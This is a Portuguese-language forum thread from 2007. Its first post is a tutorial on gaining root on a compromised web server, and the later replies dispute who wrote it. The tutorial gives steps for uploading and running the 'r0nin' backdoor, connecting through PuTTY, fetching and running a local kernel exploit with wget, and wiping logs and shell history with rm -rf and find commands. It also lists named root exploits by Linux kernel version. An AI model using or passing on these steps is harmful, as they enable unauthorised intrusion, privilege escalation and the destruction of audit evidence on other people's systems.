Obtento Root

Started by oniarce, 27 de December , 2007, 09:35:53 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

oniarce

Este texto foi retirado do forum dos Invaders


¤ Obtento Root ¤ (e uso do Putty)


Bom um pequeno tutorial ensinando.

Depois de ter injetado na shell ache um lugar na shell que você
tenha acesso para upar um backdoor, geralmente na /tmp (arquivos

temporarios)

depois de ter upado o backdoor no caso eu vo citar o r0nin.

depois de ter upado o 'r0nin' (backdoor)

de um chmod 777 r0nin

depois um

./r0nin (para rodar o backdoor)

se rodar adequadamente ele irá mostrar a porta da shell e se
existe xpl para a versão do kernel da sua shell.

Depois de saber a porta que coneta a shell você você prescisá do hostname

ou ip do site para conectar ao putty...

Para pegar o ip de qualquer site vá em iniciar / executar / cmd
Digite:

ping -t "E o endereço do site"

ex:

ping -t www.garc.com

ele vai disparar pacotes contra o site e mostrará o ip...

Pronto

coloque o ip no do site no putty
e a porta depois conecte e ... *Alakazam*
você está conectado a shell...
depois só rodar o xpl local você pode rodar pela tmp mesmo:

cd /var/tmp
wget url do xpl local
e depois
./xpl

Pronto se o xpl local que você rodou for da versão do kernel de sua shell
Pinba, root quebrado agora você possui TOTAL ACESSO a shell, bom

divertimento.


Alguns comandos de sempre para apagar os logs:
Citação:

Código:
rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf $HISTFILE
find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


Kernel e suas Versões.
_________________________________________

2.4.17
newlocal
kmod


2.4.18
brk
brk2
newlocal
kmod
km.2


2.4.19
brk
brk2
newlocal
kmod
km.2


2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2


2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod


2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod


2.4.22-10
loginx
./loginx


2.4.23
mremap_pte


2.4.24
mremap_pte
Uselib24


2.4.25-1
uselib24


2.4.27
Uselib24


2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0:
=
wuftpd
h00lyshit


2.6.2
mremap_pte
krad
h00lyshit


2.6.5 to 2.6.10
krad
krad2
h00lyshit


2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit


2.6.9-34
r00t
h00lyshit


2.6.13-17
prctl
h00lyshit

e para vc saber que adquiriu root na shell eh simples
digita id e ira aparecer isso
~ # id
uid=0(root) gid=0(root)
pronto
sua shell eh root faz oq tu quiser

Wuefez

AFFFFFFF

Eu que escrevi essa M*E*R*D*A em 2006, e postei no meu site www.wuefez.org, ai aparemente, algum lam0 de merda copiou do meu site meu tutorial (o que ate ai não seria problema) TROCOU AS PALAVRAS porque quem ja viu meus posts sabe que não escrevo assim, e saiu postando em forums lammers......

PLAGIO TOTAL


"Quem fala não faz."

oniarce

Me desculpe Wuefez, a minha intençao não foi te prejudicar.
Eu te agradeço por faser um tutorial bem estruturdo.  :-[

#phobia

Eiiiita!

Plágio é phoda!
Esquenta não oniarce, pelo menos você colocou a fonte e talz... rsrs
Pior é o cara que deu um copy no tuto do wuefez e modificou algumas palavras!!!

Como diz o ditado:
"Na internet nada se cria, nada se perde. Tudo se transforma!"

Huahsdfuashdfuasdfa  ;D


Foi só pra descontrair...
É triste!

lolz!

Wuefez

Pior que eu sabia que plágio tinha acento...

ééé

agora ja foi


"Quem fala não faz."

rog

entao aproveita a corrigir porque nao se da pinga em subdominio

rog
realty.sys is corrupt :  reboot the universe (Y/N)